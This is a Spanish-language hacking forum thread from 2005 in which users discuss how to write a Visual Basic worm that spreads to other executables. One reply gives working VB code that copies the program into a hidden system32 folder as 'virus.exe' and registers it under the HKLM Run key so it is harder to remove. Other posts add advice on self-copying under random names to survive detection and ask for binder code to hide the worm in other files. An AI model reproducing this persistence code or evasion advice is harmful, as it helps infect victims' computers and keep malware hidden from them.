 Autor
|
Tema: Gusano!! (Leído 4,793 veces)
|
goodbye
 Desconectado
Mensajes: 93
|
 |
Gusano!!
« en: 25 Junio 2005, 08:52 am » |
|
Señores, quien sabe como seria un ejemplo de gusano con VB. Un code que inocule nuestro .exe en otros archivos, de manera que al abrirlos posteriormente tambien vuelva a ejecutarlo. Como harian una infeccion?? 
|
|
|
|
|
En línea
|
Al lado de la dificultad está la facilidad.
Cambiad de placeres, pero no cambies de amigos.
Aceptar un favor de un amigo, es hacerle otro.
|
|
|
|
programatrix
|
Te voy a poner aqui un código básico para infectar un equipo con tu gusano: Set sh = CreateObject("WScript.Shell")
Set ficheros = CreateObject("Scripting.FileSystemObject")
ficheros.CreateFolder "C:\Windows\system32\privatesystem"
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\Windows\system32\privatesystem" & "\" & "virus" & ".exe"
Call SetAttr("C:\Windows\system32\privatesystem" & "\virus.EXE", vbHidden)
sh.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\private", "C:\Windows\system32\privatesystem\virus.exe"Con esto se copia el fichero a una carpeta de system32 creada tu antes, se oculta el programa para que el usuario no lo pueda borrar o le sea mas dificil y luego se registra como aplicación de arranque en HKEY_LOCAL_MACHINE.
|
|
|
|
|
En línea
|
|
|
|
5v5
Desconectado
Mensajes: 57
|
Hola...Tambien podrias realizar que en cazo de que cierren tu programa al ser detectado, cree una copia de si mismo con un nombre aleatorio, ademas se grave en una carpeta aleatoria, tambien que esa direccion y nombre de la copia se grave en el clave run, para que se ejecute tu copia, ya que si detectan tu .exe original lo pueden eliminar.......y asi tu gusano no muere........en este momento me encuentro un poco ocupado pero en cuento me desecupe te mando unos codes de ejemplo, bueno si es que los necesitas......espero te sirva esta idea
|
|
|
|
|
En línea
|
|
|
|
Pseudoroot
Desconectado
Mensajes: 839
|
oues pudiste haber posteado en la sección de troyanos y virus, supongo que lo que pretendes hacer es infeccion de exes con visual basic..en www.gedzac.tk hay un manual que lo explica.. |
|
|
|
|
En línea
|
|
|
|
BenRu
The Prodigy
Desconectado
Mensajes: 4.006
|
Yo ice uno...lomejor es vbscript...
|
|
|
|
|
En línea
|
|
|
|
|
|
Slasher-K
Desconectado
Mensajes: 1.477
|
Una cosa es un gusano que se reproduce y otra cosa un virus que infecta archivos. Si lo que querés es un worm puse un ejemplo hace un tiempo: Ejemplo de Worm (gusano) en VBSi la idea era infectar archivos ya es algo mucho más avanzado que requiere conocimientos de asm, la estructura de los archivos ejecutables, métodos de infección, entre otros. Si conoces a fondo la estructura de los ejecutables entonces sólo es realizar pruebas. Para más información acerca de su formato mira el siguiente post: http://foro.elhacker.net/index.php/topic,73694.msg338298.html#msg338298Y VBS es lo peor para realizar worms, por empezar lo detectan los AVs y segundo que es lentisimo, pero eso no significa que no sirva. Saludos. |
|
|
|
|
En línea
|
 A la reina de las profundidades que cuida los pasos de una sombra en la noche :* |
|
|
Pseudoroot
Desconectado
Mensajes: 839
|
pues figate que en su tiempo este lenguaje tan empequeñesido como lo dejas tu,, fue el que se utilizó para programar I love you.. y me imagino que conoceras las consecuencias que trajo ..
hoy por hoy, es cierto es un lenguaje que ya no se usa para programar worm .debido a que todos querian hacer su gusano en el ,y por lo mismo ya lo detectan lo AVs...
Pero, de que permite hacer muchas cosas, lo permite y de manera bastante facil..en comparacion con lenguajes de proposito general ..
|
|
|
|
|
En línea
|
|
|
|
|
|
goodbye
Desconectado
Mensajes: 93
|
Muy bien!! Gracias a todos!!
Dunklerstern - Excelente la reproduccion del gusano.
[P$3ud0r00†] - No puedo ver el manual que dices, como le encuentras en ese sitio?
Del 'I Love You' no estoy seguro si en lo que se ha publicado como su fuente este virus hace una verdadera infectacion a los archivos de la pc.
Pienso que - a lo mejor sirve para infectar, hacer un juntador o binder que metiera el clon del ejecutable a todo el vecindario de archivos.
Por lo tanto, alguien tiene un code de juntador en VB que le funcione??
|
|
|
|
« Última modificación: 26 Junio 2005, 07:13 am por CrackelDestripador »
|
En línea
|
Al lado de la dificultad está la facilidad.
Cambiad de placeres, pero no cambies de amigos.
Aceptar un favor de un amigo, es hacerle otro.
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
Gusano redlan
Hacking
|
HackTeam
|
0
|
1,555
|
13 Febrero 2011, 02:38 am
por HackTeam
|
|
|
|
gusano
« 1 2 »
Análisis y Diseño de Malware
|
CAR3S?
|
11
|
9,475
|
21 Febrero 2012, 23:52 pm
por m0rf
|
|
|
Crear un gusano en C
Análisis y Diseño de Malware
|
xhule
|
7
|
8,808
|
19 Junio 2013, 19:11 pm
por Belial & Grimoire
|
|
|
|
necesito la muestra de un gusano
Análisis y Diseño de Malware
|
General Dmitry Vergadoski
|
3
|
2,606
|
27 Agosto 2013, 15:41 pm
por Danyfirex
|
|
|
|
Gusano básico en C++
Programación C/C++
|
zikotik
|
7
|
6,240
|
25 Octubre 2014, 02:18 am
por rir3760
|
 |
